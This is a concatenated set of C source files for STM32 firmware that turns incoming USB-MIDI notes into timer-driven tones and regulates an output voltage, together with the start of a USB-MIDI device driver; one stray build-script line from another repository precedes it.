gulp.task("default", gulp.series("lint", "htm", "gbk-js", "chm"));
| gucong3000/css-book |
<|start_filename|>software/Inc/curelib_inc/curemisc.h<|end_filename|>
/*
*******************************************************************************
* [curemisc.h]
*
* This program is under the terms of the GPLv3.
* https://www.gnu.org/licenses/gpl-3.0.html
*
* Copyright(c) 2017 Keshikan (www.keshikan.net)
*******************************************************************************
*/
#ifndef _CUREMISC_H_
#define _CUREMISC_H_
#include <stdbool.h>
#include <stdint.h>
#ifndef BOOL
#define BOOL bool
#define TRUE true
#define FALSE false
#endif
// LOWORD / HIWORD: return the lower / higher 16 bits of a 32-bit value
// LOBYTE / HIBYTE: return the lower / higher 4 bits (nibble) of an 8-bit value
#ifndef LOWORD
#define LOWORD(n) ( (uint16_t)(n) )
#endif
#ifndef HIWORD
#define HIWORD(n) ( (uint16_t)(((uint32_t)(n) >> 16) & 0xFFFF) )
#endif
#ifndef LOBYTE
#define LOBYTE(n) ( ((uint8_t)(n)) & 0x0F )
#endif
#ifndef HIBYTE
#define HIBYTE(n) ( (uint8_t)(((n) >> 4) & 0x0F) )
#endif
typedef enum{
FUNC_ERROR,FUNC_SUCCESS
}FUNC_STATUS;
#endif
<|start_filename|>software/Src/main.c<|end_filename|>
/**
******************************************************************************
* @file : main.c
* @brief : Main program body
******************************************************************************
* This notice applies to any and all portions of this file
* that are not between comment pairs USER CODE BEGIN and
* USER CODE END. Other portions of this file, whether
* inserted by the user or by software development tools
* are owned by their respective copyright owners.
*
* Copyright (c) 2018 STMicroelectronics International N.V.
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted, provided that the following conditions are met:
*
* 1. Redistribution of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
* 3. Neither the name of STMicroelectronics nor the names of other
* contributors to this software may be used to endorse or promote products
* derived from this software without specific written permission.
* 4. This software, including modifications and/or derivative works of this
* software, must execute solely and exclusively on microcontroller or
* microprocessor devices manufactured by or for STMicroelectronics.
* 5. Redistribution and use of this software other than as permitted under
* this license is void and will automatically terminate your rights under
* this license.
*
* THIS SOFTWARE IS PROVIDED BY STMICROELECTRONICS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS, IMPLIED OR STATUTORY WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
* PARTICULAR PURPOSE AND NON-INFRINGEMENT OF THIRD PARTY INTELLECTUAL PROPERTY
* RIGHTS ARE DISCLAIMED TO THE FULLEST EXTENT PERMITTED BY LAW. IN NO EVENT
* SHALL STMICROELECTRONICS OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
* LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
* OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
* LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
* NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
* EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
******************************************************************************
*/
/* Includes ------------------------------------------------------------------*/
#include "main.h"
#include "stm32f0xx_hal.h"
#include "usb_device.h"
/* USER CODE BEGIN Includes */
#include "device_conf.h"
#include "curemisc.h"
#include "curebuffer.h"
#include "usbd_midi_if.h"
#include "math.h"
/* USER CODE END Includes */
/* Private variables ---------------------------------------------------------*/
TIM_HandleTypeDef htim14;
TIM_HandleTypeDef htim15;
TIM_HandleTypeDef htim17;
TIM_HandleTypeDef htim2;
TIM_HandleTypeDef htim1;
DAC_HandleTypeDef hdac;
ADC_HandleTypeDef hadc;
DMA_HandleTypeDef hdma_adc;
uint16_t adcBuffer[3];
uint8_t uart_tx_dat;
/* USER CODE END PV */
/* Private function prototypes -----------------------------------------------*/
void SystemClock_Config(void);
static void MX_GPIO_Init(void);
static void MX_TIM14_Init(void);
static void MX_TIM15_Init(void);
static void MX_TIM17_Init(void);
static void USER_TIM2_Init(void);
static void USER_TIM1_Init(void);
static void MX_DAC_Init(void);
static void MX_DMA_Init(void);
static void MX_ADC_Init(void);
void htim17_update(void);
uint32_t Vout = 0;
uint16_t Iout = 0;
uint32_t Vset = 0;
uint32_t Vmax = 52000;
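/* Regulation loop, presumably called from the TIM17 update interrupt:
 * scales the DMA'd ADC samples into Iout/Vout, applies a clamped
 * proportional correction to the TIM1 PWM duty so Vout tracks Vset,
 * and forces the duty to zero above ~55000 as an overvoltage cutoff. */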
void htim17_update() {
Iout = adcBuffer[0] * 1.33f;
Vout = adcBuffer[1] * 16.6f;
int32_t error = Vset - Vout;
TIM1->CCR1 = CLAMP(error / 3, 0, 500);
if (Vout > 55000) {
TIM1->CCR1 = 0;
}
}
/* USER CODE BEGIN PFP */
/* Private function prototypes -----------------------------------------------*/
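/* Enter DFU: write a magic word to a fixed RAM address and reset; the reset
 * handler is presumably set up to detect this value and jump to the system
 * bootloader (a common STM32 soft-DFU-entry pattern). */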
void dfu_otter_bootloader(void)
{
*((unsigned long *)0x20003FF0) = 0xDEADBEEF;
NVIC_SystemReset();
}
/* USER CODE END PFP */
/* USER CODE BEGIN 0 */
uint32_t curPeriode0 = 0;
uint32_t curPeriode1 = 0;
void HAL_TIM_PeriodElapsedCallback(TIM_HandleTypeDef *htim)
{
if(htim->Instance == TIM14)
{
//HAL_TIM_OnePulse_Start(&htim2, TIM_CHANNEL_2);
if (TIM2->CNT == 0) {
TIM2->ARR = (uint32_t)(curPeriode0 / CLAMP(((Iout/200)-10), 3, 16)); // Play first channel
TIM2->CR1 = TIM2->CR1 | 1;
}
}
if(htim->Instance == TIM15)
{
//HAL_TIM_OnePulse_Start(&htim2, TIM_CHANNEL_2);
if (TIM2->CNT == 0) {
TIM2->ARR = (uint32_t)(curPeriode1 / 8); // Play second channel with less power
TIM2->CR1 = TIM2->CR1 | 1;
}
}
}
/**
* @brief The application entry point.
*
* @retval None
*/
uint8_t midiBuffer[4];
uint8_t midiState = 0;
uint16_t curTone0 = 0;
uint16_t curTone1 = 0;
uint16_t curChannel = 0;
uint16_t lastTone0 = 0;
uint16_t lastTone1 = 0;
uint32_t noteTimeout = 0;
uint16_t freqs[16] = {0};
int main(void)
{
/* USER CODE BEGIN 1 */
/* USER CODE END 1 */
/* MCU Configuration----------------------------------------------------------*/
/* Reset of all peripherals, Initializes the Flash interface and the Systick. */
HAL_Init();
/* USER CODE BEGIN Init */
/* USER CODE END Init */
/* Configure the system clock */
SystemClock_Config();
/* USER CODE BEGIN SysInit */
/* USER CODE END SysInit */
/* Initialize all configured peripherals */
MX_GPIO_Init();
HAL_GPIO_WritePin(LED_POW_GPIO, LED_POW_PIN, SET);
HAL_GPIO_WritePin(LED_FAULT_GPIO, LED_FAULT_PIN, SET);
MX_DAC_Init();
HAL_DAC_Start(&hdac, DAC_CHANNEL_1);
HAL_DAC_SetValue(&hdac, DAC_CHANNEL_1, DAC_ALIGN_12B_R, 2048);
MX_TIM14_Init();
HAL_TIM_Base_Start_IT(&htim14);
TIM14->CR1 &= ~(1UL);
MX_TIM15_Init();
HAL_TIM_Base_Start_IT(&htim15);
TIM15->CR1 &= ~(1UL);
MX_DMA_Init();
MX_ADC_Init();
HAL_ADC_Start_DMA(&hadc, (uint32_t*)adcBuffer, 3);
USER_TIM1_Init();
//HAL_TIM_PWM_Start(&htim1);
HAL_TIM_PWM_Start_IT(&htim1, TIM_CHANNEL_1);
//__HAL_TIM_SET_COMPARE(&htim1, TIM_CHANNEL_1, 1000);
USER_TIM2_Init();
HAL_TIM_Base_Start(&htim2);
HAL_TIM_OnePulse_Start(&htim2, TIM_CHANNEL_2);
/* USER CODE BEGIN 2 */
//USB-MIDI Init
MX_USB_MIDI_INIT();
//HAL_GPIO_WritePin(LED_POW_GPIO, LED_POW_PIN, RESET);
if(FUNC_ERROR == midiInit() ){
while(1){
HAL_GPIO_WritePin(LED_POW_GPIO, LED_POW_PIN, SET);
HAL_Delay(500);
HAL_GPIO_WritePin(LED_POW_GPIO, LED_POW_PIN, RESET);
HAL_Delay(500);
}
}
//Wait usb configuration.
while(1){
if(USBD_STATE_CONFIGURED == hUsbDeviceFS.dev_state){
//HAL_GPIO_WritePin(LED_POW_GPIO, LED_POW_PIN, SET);
break;
}else{
HAL_GPIO_WritePin(LED_POW_GPIO, LED_POW_PIN, RESET);
}
}
MX_TIM17_Init();
HAL_TIM_Base_Start_IT(&htim17);
for (uint32_t i = 0; i < Vmax; i+=100) {
Vset = i;
HAL_Delay(3);
}
HAL_GPIO_WritePin(LED_FAULT_GPIO, LED_FAULT_PIN, RESET);
Vset = Vmax;
while (1)
{
//Wait for USB configuration when a USB connection error has occurred.
while(1){
//HAL_GPIO_WritePin(LED_POW_GPIO, LED_POW_PIN, SET);
if(USBD_STATE_CONFIGURED == hUsbDeviceFS.dev_state){
HAL_GPIO_WritePin(LED_POW_GPIO, LED_POW_PIN, SET);
break;
}else{
HAL_GPIO_WritePin(LED_POW_GPIO, LED_POW_PIN, SET);
HAL_Delay(200);
HAL_GPIO_WritePin(LED_POW_GPIO, LED_POW_PIN, RESET);
HAL_Delay(200);
}
}
if (HAL_GPIO_ReadPin(BUTTON_GPIO, BUTTON_PIN)) {
dfu_otter_bootloader();
}
curTone0 = 0;
curTone1 = 0;
for( int i = 0; i < 16; i++ ) { // find the two highest pitches across all channels
if( freqs[i] > curTone0 ) {
curTone1 = curTone0;
curTone0 = freqs[i];
}
else if( freqs[i] > curTone1 ) {
curTone1 = freqs[i];
}
}
if (curTone0 > 20 && curTone0 != lastTone0) { // play one tone using TIM14
curPeriode0 = (uint32_t)1000000 / (uint32_t)(curTone0);
TIM14->CNT = 0;
TIM14->ARR = curPeriode0;
TIM14->CR1 = TIM14->CR1 | 1;
lastTone0 = curTone0;
noteTimeout = HAL_GetTick();
HAL_GPIO_WritePin(LED_FAULT_GPIO, LED_FAULT_PIN, SET);
} else if (curTone0 < 20 && curTone0 != lastTone0) {
TIM14->CR1 &= ~(1UL);
curPeriode0 = 0;
HAL_GPIO_WritePin(LED_FAULT_GPIO, LED_FAULT_PIN, RESET);
}
if (curTone1 > 20 && curTone1 != lastTone1) { // play the other polyphonic tone using TIM15
curPeriode1 = (uint32_t)1000000 / (uint32_t)(curTone1);
TIM15->CNT = 0;
TIM15->ARR = curPeriode1;
TIM15->CR1 = TIM15->CR1 | 1;
lastTone1 = curTone1;
noteTimeout = HAL_GetTick();
} else if (curTone1 < 20 && curTone1 != lastTone1) {
TIM15->CR1 &= ~(1UL);
curPeriode1 = 0;
}
if ((HAL_GetTick() - noteTimeout) > 1000) {
TIM14->CR1 &= ~(1UL);
TIM15->CR1 &= ~(1UL);
for (int i = 0; i < 16; i++) {
freqs[i] = 0;
}
HAL_GPIO_WritePin(LED_FAULT_GPIO, LED_FAULT_PIN, RESET);
}
//[USB-MIDI IN] to [MIDI JACK OUT]
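// Minimal 3-byte MIDI parser: a byte with the MSB set starts a new message,
// the next two data bytes complete it (running status is not handled).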
if( FUNC_SUCCESS == midiGetFromUsbRx(0, &uart_tx_dat)){
if (uart_tx_dat >> 7 == 1) {
midiBuffer[0] = uart_tx_dat;
midiBuffer[1] = 0;
midiBuffer[2] = 0;
midiState = 1;
} else if (midiState == 1) {
midiBuffer[1] = uart_tx_dat;
midiState = 2;
} else if (midiState == 2) {
midiBuffer[2] = uart_tx_dat;
midiState = 3;
if ((midiBuffer[0] & 0xF0) == 0x90) { // Note on, 2 data bytes
char key = midiBuffer[1];
char vel = midiBuffer[2];
uint16_t freq = pow(2,(key-0x45)/12.0)*440.0;
curChannel = midiBuffer[0] & 0xF;
// Note on with a velocity of 0x00 is the same as a note off message. MIDI Spec:
// "A receiver must be capable of recognizing either method of turning off a note, and should treat them identically."
if (vel == 0) {
if (freqs[curChannel] == freq)
freqs[curChannel] = 0;
} else {
freqs[curChannel] = freq;
}
}
if ((midiBuffer[0] & 0xF0) == 0x80) { // Note off, 2 data bytes
char key = midiBuffer[1];
char vel = midiBuffer[2];
uint16_t freq = pow(2,(key-0x45)/12.0)*440.0;
//if (freqs[midiBuffer[0] & 0xF] == freq) {
freqs[midiBuffer[0] & 0xF] = 0;
//}
}
}
}
//[MIDI JACK IN] to [USB-MIDI OUT]
//midiProcess();
}
/* USER CODE END 3 */
}
/** System Clock Configuration
*/
void SystemClock_Config(void)
{
RCC_OscInitTypeDef RCC_OscInitStruct;
RCC_ClkInitTypeDef RCC_ClkInitStruct;
RCC_PeriphCLKInitTypeDef PeriphClkInit;
/**Initializes the CPU, AHB and APB busses clocks
*/
RCC_OscInitStruct.OscillatorType = RCC_OSCILLATORTYPE_HSI14|RCC_OSCILLATORTYPE_HSI48;
RCC_OscInitStruct.HSI48State = RCC_HSI48_ON;
RCC_OscInitStruct.HSI14State = RCC_HSI14_ON;
RCC_OscInitStruct.HSI14CalibrationValue = 16;
RCC_OscInitStruct.PLL.PLLState = RCC_PLL_NONE;
if (HAL_RCC_OscConfig(&RCC_OscInitStruct) != HAL_OK)
{
_Error_Handler(__FILE__, __LINE__);
}
/**Initializes the CPU, AHB and APB busses clocks
*/
RCC_ClkInitStruct.ClockType = RCC_CLOCKTYPE_HCLK|RCC_CLOCKTYPE_SYSCLK
|RCC_CLOCKTYPE_PCLK1;
RCC_ClkInitStruct.SYSCLKSource = RCC_SYSCLKSOURCE_HSI48;
RCC_ClkInitStruct.AHBCLKDivider = RCC_SYSCLK_DIV1;
RCC_ClkInitStruct.APB1CLKDivider = RCC_HCLK_DIV1;
if (HAL_RCC_ClockConfig(&RCC_ClkInitStruct, FLASH_LATENCY_1) != HAL_OK)
{
_Error_Handler(__FILE__, __LINE__);
}
PeriphClkInit.PeriphClockSelection = RCC_PERIPHCLK_USB;
PeriphClkInit.UsbClockSelection = RCC_USBCLKSOURCE_HSI48;
if (HAL_RCCEx_PeriphCLKConfig(&PeriphClkInit) != HAL_OK)
{
_Error_Handler(__FILE__, __LINE__);
}
/**Configure the Systick interrupt time
*/
HAL_SYSTICK_Config(HAL_RCC_GetHCLKFreq()/1000);
/**Configure the Systick
*/
HAL_SYSTICK_CLKSourceConfig(SYSTICK_CLKSOURCE_HCLK);
/* SysTick_IRQn interrupt configuration */
HAL_NVIC_SetPriority(SysTick_IRQn, 0, 0);
}
/* ADC init function */
static void MX_ADC_Init(void)
{
__HAL_RCC_ADC1_CLK_ENABLE();
ADC_ChannelConfTypeDef sConfig;
/**Configure the global features of the ADC (Clock, Resolution, Data Alignment and number of conversion)
*/
hadc.Instance = ADC1;
hadc.Init.ClockPrescaler = ADC_CLOCK_ASYNC_DIV1;
hadc.Init.Resolution = ADC_RESOLUTION_12B;
hadc.Init.DataAlign = ADC_DATAALIGN_RIGHT;
hadc.Init.ScanConvMode = ADC_SCAN_DIRECTION_FORWARD;
hadc.Init.EOCSelection = ADC_EOC_SEQ_CONV;
hadc.Init.LowPowerAutoWait = DISABLE;
hadc.Init.LowPowerAutoPowerOff = DISABLE;
hadc.Init.ContinuousConvMode = DISABLE;
hadc.Init.DiscontinuousConvMode = DISABLE;
hadc.Init.ExternalTrigConv = ADC_EXTERNALTRIGCONV_T1_TRGO;
hadc.Init.ExternalTrigConvEdge = ADC_EXTERNALTRIGCONVEDGE_RISING;
hadc.Init.DMAContinuousRequests = ENABLE;
hadc.Init.Overrun = ADC_OVR_DATA_PRESERVED;
if (HAL_ADC_Init(&hadc) != HAL_OK)
{
_Error_Handler(__FILE__, __LINE__);
}
/**Configure for the selected ADC regular channel to be converted.
*/
sConfig.Channel = ADC_CHANNEL_0;
sConfig.Rank = ADC_RANK_CHANNEL_NUMBER;
sConfig.SamplingTime = ADC_SAMPLETIME_28CYCLES_5;
if (HAL_ADC_ConfigChannel(&hadc, &sConfig) != HAL_OK)
{
_Error_Handler(__FILE__, __LINE__);
}
/**Configure for the selected ADC regular channel to be converted.
*/
sConfig.Channel = ADC_CHANNEL_1;
if (HAL_ADC_ConfigChannel(&hadc, &sConfig) != HAL_OK)
{
_Error_Handler(__FILE__, __LINE__);
}
/**Configure for the selected ADC regular channel to be converted.
*/
sConfig.Channel = ADC_CHANNEL_2;
if (HAL_ADC_ConfigChannel(&hadc, &sConfig) != HAL_OK)
{
_Error_Handler(__FILE__, __LINE__);
}
}
/**
* Enable DMA controller clock
*/
static void MX_DMA_Init(void)
{
/* DMA controller clock enable */
__HAL_RCC_DMA1_CLK_ENABLE();
/* DMA interrupt init */
/* DMA1_Channel1_IRQn interrupt configuration */
HAL_NVIC_SetPriority(DMA1_Channel1_IRQn, 0, 0);
HAL_NVIC_EnableIRQ(DMA1_Channel1_IRQn);
}
/* TIM14 init function */
static void MX_TIM14_Init(void)
{
htim14.Instance = TIM14;
htim14.Init.Prescaler = 11;
htim14.Init.CounterMode = TIM_COUNTERMODE_UP;
htim14.Init.Period = 1000;
htim14.Init.ClockDivision = TIM_CLOCKDIVISION_DIV4;
htim14.Init.RepetitionCounter = 0;
htim14.Init.AutoReloadPreload = TIM_AUTORELOAD_PRELOAD_DISABLE;
if (HAL_TIM_Base_Init(&htim14) != HAL_OK)
{
_Error_Handler(__FILE__, __LINE__);
}
}
/* TIM15 init function */
static void MX_TIM15_Init(void)
{
htim15.Instance = TIM15;
htim15.Init.Prescaler = 11;
htim15.Init.CounterMode = TIM_COUNTERMODE_UP;
htim15.Init.Period = 1000;
htim15.Init.ClockDivision = TIM_CLOCKDIVISION_DIV4;
htim15.Init.RepetitionCounter = 0;
htim15.Init.AutoReloadPreload = TIM_AUTORELOAD_PRELOAD_DISABLE;
if (HAL_TIM_Base_Init(&htim15) != HAL_OK)
{
_Error_Handler(__FILE__, __LINE__);
}
}
/* TIM17 init function */
static void MX_TIM17_Init(void)
{
htim17.Instance = TIM17;
htim17.Init.Prescaler = 11;
htim17.Init.CounterMode = TIM_COUNTERMODE_UP;
htim17.Init.Period = 1000;
htim17.Init.ClockDivision = TIM_CLOCKDIVISION_DIV4;
htim17.Init.RepetitionCounter = 0;
htim17.Init.AutoReloadPreload = TIM_AUTORELOAD_PRELOAD_ENABLE;
if (HAL_TIM_Base_Init(&htim17) != HAL_OK)
{
_Error_Handler(__FILE__, __LINE__);
}
}
static void USER_TIM2_Init(void) {
__HAL_RCC_TIM2_CLK_ENABLE();
TIM_ClockConfigTypeDef sClockSourceConfig;
TIM_MasterConfigTypeDef sMasterConfig;
TIM_OC_InitTypeDef sConfigOC;
htim2.Instance = TIM2;
htim2.Init.Prescaler = 0;
htim2.Init.CounterMode = TIM_COUNTERMODE_UP;
htim2.Init.Period = 3200;
htim2.Init.ClockDivision = TIM_CLOCKDIVISION_DIV4;
HAL_TIM_Base_Init(&htim2);
sMasterConfig.MasterOutputTrigger = TIM_TRGO_RESET;
sMasterConfig.MasterSlaveMode = TIM_MASTERSLAVEMODE_DISABLE;
HAL_TIMEx_MasterConfigSynchronization(&htim2, &sMasterConfig);
sConfigOC.OCMode = TIM_OCMODE_PWM1;
sConfigOC.Pulse = 1;
sConfigOC.OCPolarity = TIM_OCPOLARITY_LOW;
sConfigOC.OCFastMode = TIM_OCFAST_DISABLE;
HAL_TIM_PWM_ConfigChannel(&htim2, &sConfigOC, TIM_CHANNEL_2);
HAL_TIM_OnePulse_Init(&htim2, TIM_OPMODE_SINGLE);
HAL_TIM_MspPostInit(&htim2);
}
static void USER_TIM1_Init(void)
{
__HAL_RCC_TIM1_CLK_ENABLE();
TIM_MasterConfigTypeDef sMasterConfig;
TIM_OC_InitTypeDef sConfigOC;
TIM_BreakDeadTimeConfigTypeDef sBreakDeadTimeConfig;
htim1.Instance = TIM1;
htim1.Init.Prescaler = 0;
htim1.Init.CounterMode = TIM_COUNTERMODE_UP;
htim1.Init.Period = 1024;
htim1.Init.ClockDivision = TIM_CLOCKDIVISION_DIV2;
htim1.Init.RepetitionCounter = 0;
htim1.Init.AutoReloadPreload = TIM_AUTORELOAD_PRELOAD_ENABLE;
if (HAL_TIM_PWM_Init(&htim1) != HAL_OK)
{
_Error_Handler(__FILE__, __LINE__);
}
sMasterConfig.MasterOutputTrigger = TIM_TRGO_UPDATE;
sMasterConfig.MasterSlaveMode = TIM_MASTERSLAVEMODE_DISABLE;
if (HAL_TIMEx_MasterConfigSynchronization(&htim1, &sMasterConfig) != HAL_OK)
{
_Error_Handler(__FILE__, __LINE__);
}
sConfigOC.OCMode = TIM_OCMODE_PWM1;
sConfigOC.Pulse = 0;
sConfigOC.OCPolarity = TIM_OCPOLARITY_HIGH;
sConfigOC.OCNPolarity = TIM_OCNPOLARITY_HIGH;
sConfigOC.OCFastMode = TIM_OCFAST_DISABLE;
sConfigOC.OCIdleState = TIM_OCIDLESTATE_RESET;
sConfigOC.OCNIdleState = TIM_OCNIDLESTATE_RESET;
if (HAL_TIM_PWM_ConfigChannel(&htim1, &sConfigOC, TIM_CHANNEL_1) != HAL_OK)
{
_Error_Handler(__FILE__, __LINE__);
}
sBreakDeadTimeConfig.OffStateRunMode = TIM_OSSR_DISABLE;
sBreakDeadTimeConfig.OffStateIDLEMode = TIM_OSSI_DISABLE;
sBreakDeadTimeConfig.LockLevel = TIM_LOCKLEVEL_OFF;
sBreakDeadTimeConfig.DeadTime = 0;
sBreakDeadTimeConfig.BreakState = TIM_BREAK_DISABLE;
sBreakDeadTimeConfig.BreakPolarity = TIM_BREAKPOLARITY_HIGH;
sBreakDeadTimeConfig.AutomaticOutput = TIM_AUTOMATICOUTPUT_DISABLE;
if (HAL_TIMEx_ConfigBreakDeadTime(&htim1, &sBreakDeadTimeConfig) != HAL_OK)
{
_Error_Handler(__FILE__, __LINE__);
}
HAL_TIM_MspPostInit(&htim1);
}
/* DAC init function */
static void MX_DAC_Init(void)
{
DAC_ChannelConfTypeDef sConfig;
/**DAC Initialization
*/
hdac.Instance = DAC;
if (HAL_DAC_Init(&hdac) != HAL_OK)
{
_Error_Handler(__FILE__, __LINE__);
}
/**DAC channel OUT1 config
*/
sConfig.DAC_Trigger = DAC_TRIGGER_NONE;
sConfig.DAC_OutputBuffer = DAC_OUTPUTBUFFER_ENABLE;
if (HAL_DAC_ConfigChannel(&hdac, &sConfig, DAC_CHANNEL_1) != HAL_OK)
{
_Error_Handler(__FILE__, __LINE__);
}
}
/** Configure pins as
* Analog
* Input
* Output
* EVENT_OUT
* EXTI
*/
static void MX_GPIO_Init(void)
{
GPIO_InitTypeDef GPIO_InitStruct;
/* GPIO Ports Clock Enable */
__HAL_RCC_GPIOF_CLK_ENABLE();
__HAL_RCC_GPIOA_CLK_ENABLE();
__HAL_RCC_GPIOB_CLK_ENABLE();
/*Configure GPIO pin Output Level */
HAL_GPIO_WritePin(GPIOA, GPIO_PIN_10|GPIO_PIN_15, GPIO_PIN_RESET);
/*Configure GPIO pins : PA4 PA5 PA6 PA7 */
GPIO_InitStruct.Pin = GPIO_PIN_10|GPIO_PIN_15;
GPIO_InitStruct.Mode = GPIO_MODE_OUTPUT_PP;
GPIO_InitStruct.Pull = GPIO_NOPULL;
GPIO_InitStruct.Speed = GPIO_SPEED_FREQ_LOW;
HAL_GPIO_Init(GPIOA, &GPIO_InitStruct);
}
/* USER CODE BEGIN 4 */
/* USER CODE END 4 */
/**
* @brief This function is executed in case of error occurrence.
* @param file: The file name as string.
* @param line: The line in file as a number.
* @retval None
*/
void _Error_Handler(char *file, int line)
{
/* USER CODE BEGIN Error_Handler_Debug */
/* User can add his own implementation to report the HAL error return state */
while(1)
{
}
/* USER CODE END Error_Handler_Debug */
}
#ifdef USE_FULL_ASSERT
/**
* @brief Reports the name of the source file and the source line number
* where the assert_param error has occurred.
* @param file: pointer to the source file name
* @param line: assert_param error line source number
* @retval None
*/
void assert_failed(uint8_t* file, uint32_t line)
{
/* USER CODE BEGIN 6 */
/* User can add his own implementation to report the file name and line number,
ex: printf("Wrong parameters value: file %s on line %d\r\n", file, line) */
/* USER CODE END 6 */
}
#endif /* USE_FULL_ASSERT */
/**
* @}
*/
/**
* @}
*/
/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/
<|start_filename|>software/Inc/device_conf.h<|end_filename|>
/*
* device_conf.h
*
* Created on: 2018/07/03
* Author: Keshikan
*/
#ifndef DEVICE_CONF_H_
#define DEVICE_CONF_H_
#define LED_POW_GPIO GPIOA
#define LED_POW_PIN GPIO_PIN_15
#define LED_FAULT_GPIO GPIOA
#define LED_FAULT_PIN GPIO_PIN_10
#define BUTTON_GPIO GPIOA
#define BUTTON_PIN GPIO_PIN_7
#endif /* DEVICE_CONF_H_ */
<|start_filename|>software/Middlewares/USBMIDI/Src/usbd_midi.c<|end_filename|>
/**
******************************************************************************
* @file usbd_midi.c
******************************************************************************
(CC at)2016 by D.F.Mac. @TripArts Music
*/
/* Includes ------------------------------------------------------------------*/
#include "usbd_midi.h"
#include "usbd_desc.h"
#include "stm32f0xx_hal_conf.h"
#include "usbd_ctlreq.h"
#include "stm32f0xx_hal.h"
static uint8_t USBD_MIDI_Init (USBD_HandleTypeDef *pdev, uint8_t cfgidx);
static uint8_t USBD_MIDI_DeInit (USBD_HandleTypeDef *pdev, uint8_t cfgidx);
static uint8_t USBD_MIDI_DataIn (USBD_HandleTypeDef *pdev, uint8_t epnum);
static uint8_t USBD_MIDI_DataOut (USBD_HandleTypeDef *pdev, uint8_t epnum);
static uint8_t *USBD_MIDI_GetCfgDesc (uint16_t *length);
//uint8_t *USBD_MIDI_GetDeviceQualifierDescriptor (uint16_t *length);
USBD_HandleTypeDef *pInstance = NULL;
uint32_t APP_Rx_ptr_in = 0;
uint32_t APP_Rx_ptr_out = 0;
uint32_t APP_Rx_length = 0;
uint8_t USB_Tx_State = 0;
__ALIGN_BEGIN uint8_t USB_Rx_Buffer[MIDI_DATA_OUT_PACKET_SIZE] __ALIGN_END ;
__ALIGN_BEGIN uint8_t APP_Rx_Buffer[APP_RX_DATA_SIZE] __ALIGN_END ;
/* USB Standard Device Descriptor */
/*
__ALIGN_BEGIN static uint8_t USBD_MIDI_DeviceQualifierDesc[USB_LEN_DEV_QUALIFIER_DESC] __ALIGN_END =
{
USB_LEN_DEV_QUALIFIER_DESC,
USB_DESC_TYPE_DEVICE_QUALIFIER,
0x00,
0x02,
0x00,
0x00,
0x00,
0x40,
0x01,
0x00,
};
*/
/* USB MIDI interface class callbacks structure */
USBD_ClassTypeDef USBD_MIDI =
{
USBD_MIDI_Init,
USBD_MIDI_DeInit,
NULL,
NULL,
NULL,
USBD_MIDI_DataIn,
USBD_MIDI_DataOut,
NULL,
NULL,
NULL,
NULL,// HS
USBD_MIDI_GetCfgDesc,// FS
NULL,// OTHER SPEED
NULL,// DEVICE_QUALIFIER
};
/* USB MIDI device Configuration Descriptor */
__ALIGN_BEGIN uint8_t USBD_MIDI_CfgDesc[USB_MIDI_CONFIG_DESC_SIZ] __ALIGN_END =
{
// configuration descriptor
0x09, 0x02, 0x65 + 6+6+9+9+1+1, 0x00, 0x02, 0x01, 0x00, 0x80, 0x0A,
// The Audio Interface Collection
0x09, 0x04, 0x00, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, // Standard AC Interface Descriptor
0x09, 0x24, 0x01, 0x00, 0x01, 0x09, 0x00, 0x01, 0x01, // Class-specific AC Interface Descriptor
0x09, 0x04, 0x01, 0x00, 0x02, 0x01, 0x03, 0x00, 0x00, // MIDIStreaming Interface Descriptors
0x07, 0x24, 0x01, 0x00, 0x01, 0x25 + 6+6+9+9, 0x00, // Class-Specific MS Interface Header Descriptor
// MIDI IN JACKS
0x06, 0x24, 0x02, 0x01, 0x01, 0x00,//MIDI-IN 1 (embedded)
0x06, 0x24, 0x02, 0x02, 0x02, 0x00,//MIDI-IN 1 (external)
0x06, 0x24, 0x02, 0x01, 0x11, 0x00,//MIDI-IN 2 (embedded)
0x06, 0x24, 0x02, 0x02, 0x12, 0x00,//MIDI-IN 2 (external)
// MIDI OUT JACKS
0x09, 0x24, 0x03, 0x01, 0x03, 0x01, 0x02, 0x01, 0x00,//MIDI-OUT 1 (embedded)
0x09, 0x24, 0x03, 0x02, 0x04, 0x01, 0x01, 0x01, 0x00,//MIDI-OUT 1 (external)
0x09, 0x24, 0x03, 0x01, 0x13, 0x01, 0x12, 0x01, 0x00,//MIDI-OUT 2 (embedded)
0x09, 0x24, 0x03, 0x02, 0x14, 0x01, 0x11, 0x01, 0x00,//MIDI-OUT 2 (external)
// OUT endpoint descriptor
0x09, 0x05, MIDI_OUT_EP, 0x02, 0x40, 0x00, 0x00, 0x00, 0x00,
0x06, 0x25, 0x01, 0x02, 0x01, 0x11,
// IN endpoint descriptor
0x09, 0x05, MIDI_IN_EP, 0x02, 0x40, 0x00, 0x00, 0x00, 0x00,
0x06, 0x25, 0x01, 0x02, 0x03, 0x13,
};
static uint8_t USBD_MIDI_Init(USBD_HandleTypeDef *pdev, uint8_t cfgidx){
pInstance = pdev;
USBD_LL_OpenEP(pdev,MIDI_IN_EP,USBD_EP_TYPE_BULK,MIDI_DATA_IN_PACKET_SIZE);
USBD_LL_OpenEP(pdev,MIDI_OUT_EP,USBD_EP_TYPE_BULK,MIDI_DATA_OUT_PACKET_SIZE);
USBD_LL_PrepareReceive(pdev,MIDI_OUT_EP,(uint8_t*)(USB_Rx_Buffer),MIDI_DATA_OUT_PACKET_SIZE);
return 0;
}
static uint8_t USBD_MIDI_DeInit (USBD_HandleTypeDef *pdev, uint8_t cfgidx){
pInstance = NULL;
